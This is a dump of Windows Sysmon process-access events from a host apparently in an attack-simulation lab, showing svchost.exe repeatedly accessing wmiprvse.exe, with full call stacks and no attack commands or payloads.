13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 